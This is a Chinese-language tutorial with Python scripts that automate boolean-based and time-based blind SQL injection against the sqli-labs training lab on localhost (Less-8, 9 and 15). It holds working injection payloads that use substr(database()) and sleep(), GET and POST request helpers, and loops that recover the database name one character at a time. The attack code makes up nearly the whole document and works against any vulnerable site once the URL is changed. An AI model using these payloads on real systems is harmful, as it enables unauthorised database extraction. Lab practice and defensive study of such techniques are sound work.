
sqli-labs时间盲注、布尔盲注脚本

script.py:提供参数,用于调用布尔盲注或时间注入的函数。注意:下文给出的模块文件名是 time_based.py 和 bool_based.py,代码中调用的也是 time_based.brute_enum_by_time / bool_based.brute_enum_by_bool,因此文件顶部的导入应为 `import time_based` 和 `import bool_based`(原文写成 time_type / bool_type,运行时会报 ImportError 或 NameError)。
import time_type
import bool_type
​
​
# inject_type: 1.布尔盲注2.时间注入
# http_type:1.GET请求2.POST请求
# dict_para_data:所有的参数,和默认值
# vuln_para:注入的参数
# payloads:注入的内容
​
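if __name__ == '__main__':
    # Time-based POST probe against the local sqli-labs Less-15 login form.
    # NOTE: the helper modules listed below are time_based.py / bool_based.py,
    # so the top-of-file imports must read `import time_based` / `import bool_based`.
    # Only point this at hosts you are authorised to test.
    dict_para_data = {
        'uname': 'admin',
        'passwd': '123',
        'submit': 'Submit',
    }
    vuln_para = 'uname'
    http_type = 2  # 2 = POST request
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    # Keep the SLEEP() argument and the detection threshold in one place so the
    # two cannot drift apart (a threshold above the sleep would never fire).
    sleep_seconds = 1
    expected_time = sleep_seconds
    payloads = [
        "admin' and if(substr(database(),",
        ",1)='",
        f"',sleep({sleep_seconds}),1) # ",
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)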
time_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
​
​
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 受攻击参数的值
# url
# expected_time : 期待等待的时间
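def send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time):
    """Send one time-based probe and report whether the server stalled.

    A copy of ``dict_para_data`` is made with ``vuln_para`` set to ``payload``;
    the caller's dict is no longer modified in place, so one template dict can
    be reused safely for every probe.

    Args:
        dict_para_data: request parameters (name -> value), including defaults.
        http_type: 1 for a GET request, 2 for a POST request.
        vuln_para: name of the injectable parameter; must be a key of
            ``dict_para_data``.
        payload: value to send in ``vuln_para``.
        url: target URL.
        expected_time: seconds the response must take to count as a hit.

    Returns:
        Whatever ``req.req_by_time_get`` / ``req.req_by_time_post`` returns
        (1 if the request took at least ``expected_time`` seconds, else 0).

    Raises:
        ValueError: if ``http_type`` is not 1 or 2, or ``vuln_para`` is not a
            key of ``dict_para_data``. Previously both cases were silent: the
            unmodified request was sent (or nothing at all, returning None),
            so the oracle answer was meaningless.
    """
    if http_type not in (1, 2):
        raise ValueError(f"http_type must be 1 (GET) or 2 (POST), got {http_type!r}")
    if vuln_para not in dict_para_data:
        raise ValueError(f"vuln_para {vuln_para!r} is not one of the request parameters")
    probe = dict(dict_para_data)
    probe[vuln_para] = payload
    if http_type == 1:
        return req.req_by_time_get(probe, url, expected_time)
    return req.req_by_time_post(probe, url, expected_time)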
​
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_time : 期待等待的时间  
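def brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads,
                       *, max_len=9, charset="0123456789abcdefghijklmnopqrstuvwxyz"):
    """Recover a string one character at a time through a time-based oracle.

    For position ``i`` (1-based, as MySQL ``substr`` expects) and candidate
    ``c`` the probe sent is ``payloads[0] + str(i) + payloads[1] + c + payloads[2]``,
    e.g. ``... substr(database(),3,1)='c' ...``.

    Args:
        dict_para_data, vuln_para, http_type, url, expected_time: passed
            straight through to ``send_payload_by_time``.
        payloads: three fragments ``[prefix, between position and char, suffix]``.
        max_len: highest position probed (default 9, the original 1..9 range).
        charset: candidates tried in order. MySQL's default collations compare
            case-insensitively, so lowercase letters also match uppercase
            names; add ``_``, ``-`` or ``$`` if the target may contain them.

    Returns:
        The recovered string, ``""`` if nothing matched. Progress is printed.

    Behaviour changes versus the original loop: the search for a position
    stops at the first hit (every further candidate was a wasted request that
    also cost a full ``sleep()`` on a true branch), and the whole enumeration
    stops at the first position with no hit, which is the end of the string
    (or a character outside ``charset``) - continuing would only append
    characters from later positions into a misaligned result.
    """
    print('[*] The Time-based blind injection is begin')
    prefix, middle, suffix = payloads[0], payloads[1], payloads[2]
    result = ""
    for position in range(1, max_len + 1):
        for candidate in charset:
            payload = f"{prefix}{position}{middle}{candidate}{suffix}"
            if send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time) == 1:
                result += candidate
                print(f"[*] The finding result: {result}")
                break
        else:
            # No candidate matched this position: end of string or charset miss.
            break
    if result == "":
        print("[*] There is no finding result")
    return result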
bool_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
​
​
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 受攻击参数的值
# url
# expected_data : 期待的返回结果 
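def send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data):
    """Send one boolean-based probe and report whether the marker text came back.

    A copy of ``dict_para_data`` is made with ``vuln_para`` set to ``payload``;
    the caller's dict is no longer modified in place.

    Args:
        dict_para_data: request parameters (name -> value), including defaults.
        http_type: 1 for a GET request, 2 for a POST request.
        inject_type: accepted for signature compatibility with the callers; it
            is not consulted here (both branches are boolean-based).
        vuln_para: name of the injectable parameter; must be a key of
            ``dict_para_data``.
        payload: value to send in ``vuln_para``.
        url: target URL.
        expected_data: substring that marks a "true" response.

    Returns:
        Whatever ``req.req_by_bool_get`` / ``req.req_by_bool_post`` returns
        (1 if ``expected_data`` is in the response body, else 0).

    Raises:
        ValueError: if ``http_type`` is not 1 or 2, or ``vuln_para`` is not a
            key of ``dict_para_data``. Previously both cases were silent: the
            unmodified request was sent (or nothing at all, returning None),
            so the oracle answer was meaningless.
    """
    if http_type not in (1, 2):
        raise ValueError(f"http_type must be 1 (GET) or 2 (POST), got {http_type!r}")
    if vuln_para not in dict_para_data:
        raise ValueError(f"vuln_para {vuln_para!r} is not one of the request parameters")
    probe = dict(dict_para_data)
    probe[vuln_para] = payload
    if http_type == 1:
        return req.req_by_bool_get(probe, url, expected_data)
    return req.req_by_bool_post(probe, url, expected_data)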
​
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_data : 期待的返回结果  
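def brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads,
                       *, max_len=9, charset="0123456789abcdefghijklmnopqrstuvwxyz"):
    """Recover a string one character at a time through a boolean-based oracle.

    For position ``i`` (1-based, as MySQL ``substr`` expects) and candidate
    ``c`` the probe sent is ``payloads[0] + str(i) + payloads[1] + c + payloads[2]``,
    e.g. ``... substr(database(),3,1)='c' ...``.

    Args:
        dict_para_data, vuln_para, http_type, inject_type, url, expected_data:
            passed straight through to ``send_payload_by_bool``.
        payloads: three fragments ``[prefix, between position and char, suffix]``.
        max_len: highest position probed (default 9, the original 1..9 range).
        charset: candidates tried in order. MySQL's default collations compare
            case-insensitively, so lowercase letters also match uppercase
            names; add ``_``, ``-`` or ``$`` if the target may contain them.

    Returns:
        The recovered string, ``""`` if nothing matched. Progress is printed.

    Behaviour changes versus the original loop: the search for a position
    stops at the first hit (every further candidate was a wasted request),
    and the whole enumeration stops at the first position with no hit, which
    is the end of the string (or a character outside ``charset``) -
    continuing would only append characters from later positions into a
    misaligned result.
    """
    print('[*] The Bool-based blind injection is begin')
    prefix, middle, suffix = payloads[0], payloads[1], payloads[2]
    result = ""
    for position in range(1, max_len + 1):
        for candidate in charset:
            payload = f"{prefix}{position}{middle}{candidate}{suffix}"
            if send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data) == 1:
                result += candidate
                print(f"[*] The finding result: {result}")
                break
        else:
            # No candidate matched this position: end of string or charset miss.
            break
    if result == "":
        print("[*] There is no finding result")
    return result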
req.py:发送数据包并判断是否为预期结果,如果是则返回1,否则返回0
import requests
import time
# payload : 参数列表
# url
# expected_data : 期待的返回结果 
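def req_by_bool_get(payload, url, expected_data, timeout=None):
    """GET ``url`` with ``payload`` as the query string and test the body.

    Args:
        payload: request parameters (name -> value).
        url: target URL.
        expected_data: substring whose presence marks a "true" response.
        timeout: seconds passed to ``requests``. ``None`` (the default, and
            the original behaviour) waits forever on a stalled connection;
            set a value in practice so one dead request cannot hang the scan.

    Returns:
        1 if ``expected_data`` occurs in the response text, else 0.
    """
    rep = requests.get(url, params=payload, timeout=timeout)
    return 1 if expected_data in rep.text else 0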
​
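def req_by_bool_post(payload, url, expected_data, timeout=None):
    """POST ``payload`` as a form body to ``url`` and test the response text.

    Args:
        payload: form fields (name -> value).
        url: target URL.
        expected_data: substring whose presence marks a "true" response.
        timeout: seconds passed to ``requests``. ``None`` (the default, and
            the original behaviour) waits forever on a stalled connection;
            set a value in practice so one dead request cannot hang the scan.

    Returns:
        1 if ``expected_data`` occurs in the response text, else 0.
    """
    rep = requests.post(url, data=payload, timeout=timeout)
    return 1 if expected_data in rep.text else 0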
​
​
# payload : 参数列表
# url
# expected_time : 期待等待的时间长短 
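def req_by_time_get(payload, url, expected_time, timeout=None):
    """GET ``url`` with ``payload`` as the query string and time the round trip.

    Elapsed time is taken with ``time.monotonic()`` rather than ``time.time()``:
    the wall clock can be adjusted (NTP, DST) mid-request and produce a bogus
    negative or inflated duration, which a monotonic clock cannot.

    Args:
        payload: request parameters (name -> value).
        url: target URL.
        expected_time: seconds the round trip must take to count as a hit.
        timeout: seconds passed to ``requests``. ``None`` (the default, and
            the original behaviour) waits forever. If set, it must exceed
            ``expected_time`` plus normal latency, otherwise a genuine hit
            surfaces as a ``requests`` timeout exception instead of 1.

    Returns:
        1 if the request took at least ``expected_time`` seconds, else 0.
        Network jitter alone can push a slow "false" response over a small
        threshold, so choose ``expected_time`` with some margin below the
        injected sleep.
    """
    started = time.monotonic()
    requests.get(url, params=payload, timeout=timeout)
    elapsed = time.monotonic() - started
    return 1 if elapsed >= expected_time else 0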
        
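def req_by_time_post(payload, url, expected_time, timeout=None):
    """POST ``payload`` as a form body to ``url`` and time the round trip.

    Elapsed time is taken with ``time.monotonic()`` rather than ``time.time()``:
    the wall clock can be adjusted (NTP, DST) mid-request and produce a bogus
    negative or inflated duration, which a monotonic clock cannot.

    Args:
        payload: form fields (name -> value).
        url: target URL.
        expected_time: seconds the round trip must take to count as a hit.
        timeout: seconds passed to ``requests``. ``None`` (the default, and
            the original behaviour) waits forever. If set, it must exceed
            ``expected_time`` plus normal latency, otherwise a genuine hit
            surfaces as a ``requests`` timeout exception instead of 1.

    Returns:
        1 if the request took at least ``expected_time`` seconds, else 0.
        Network jitter alone can push a slow "false" response over a small
        threshold, so choose ``expected_time`` with some margin below the
        injected sleep.
    """
    started = time.monotonic()
    requests.post(url, data=payload, timeout=timeout)
    elapsed = time.monotonic() - started
    return 1 if elapsed >= expected_time else 0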
测试1:布尔盲注GET请求
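# Boolean-based GET probe against sqli-labs Less-8 (indentation of the pasted
# snippet repaired; as printed, the mix of column-0 and column-4 lines would
# not parse).
dict_para_data = {
    'id': 'hack123',
}
vuln_para = 'id'
http_type = 1    # 1 = GET request
inject_type = 1  # 1 = boolean-based (passed through, not used by the helpers)
url = "http://127.0.0.1/sqli-labs/Less-8/"
# Presumably a fragment of the page text Less-8 returns only for a true
# condition; confirm against the target before relying on it.
expected_data = 'are in'
payloads = ["1' and substr(database(),", ",1)='", "' and '1'='1"]
bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)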
  
    
结果如下:

测试2:布尔盲注POST请求
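# Boolean-based POST probe against the sqli-labs Less-15 login form
# (indentation of the pasted snippet repaired).
dict_para_data = {
    'uname': 'admin',
    'passwd': '123',
    'submit': 'Submit',
}
vuln_para = 'uname'
http_type = 2    # 2 = POST request
inject_type = 1  # 1 = boolean-based (passed through, not used by the helpers)
url = "http://127.0.0.1/sqli-labs/Less-15/"
# Presumably the image name shown only on a successful login; confirm against
# the target before relying on it.
expected_data = 'flag.jpg'
payloads = ["admin' and substr(database(),", ",1)='", "' #"]
bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)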

测试3:时间注入GET测试
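    # Time-based GET probe against sqli-labs Less-9 (which returns the same page
    # for true and false, so only the delay leaks information).
    dict_para_data = {
        'id': 'hack123',
    }
    vuln_para = 'id'
    http_type = 1  # 1 = GET request
    url = "http://127.0.0.1/sqli-labs/Less-9/"
    # Keep the SLEEP() argument and the detection threshold in one place so the
    # two cannot drift apart (a threshold above the sleep would never fire).
    sleep_seconds = 1
    expected_time = sleep_seconds
    payloads = [
        "1' and if(substr(database(),",
        ",1)='",
        f"',sleep({sleep_seconds}),1) and '1'='1",
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)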

测试4:时间注入POST测试
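    # Time-based POST probe against the sqli-labs Less-15 login form.
    dict_para_data = {
        'uname': 'admin',
        'passwd': '123',
        'submit': 'Submit',
    }
    vuln_para = 'uname'
    http_type = 2  # 2 = POST request
    url = "http://127.0.0.1/sqli-labs/Less-15/"
    # Keep the SLEEP() argument and the detection threshold in one place so the
    # two cannot drift apart (a threshold above the sleep would never fire).
    sleep_seconds = 1
    expected_time = sleep_seconds
    payloads = [
        "admin' and if(substr(database(),",
        ",1)='",
        f"',sleep({sleep_seconds}),1) # ",
    ]
    time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)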

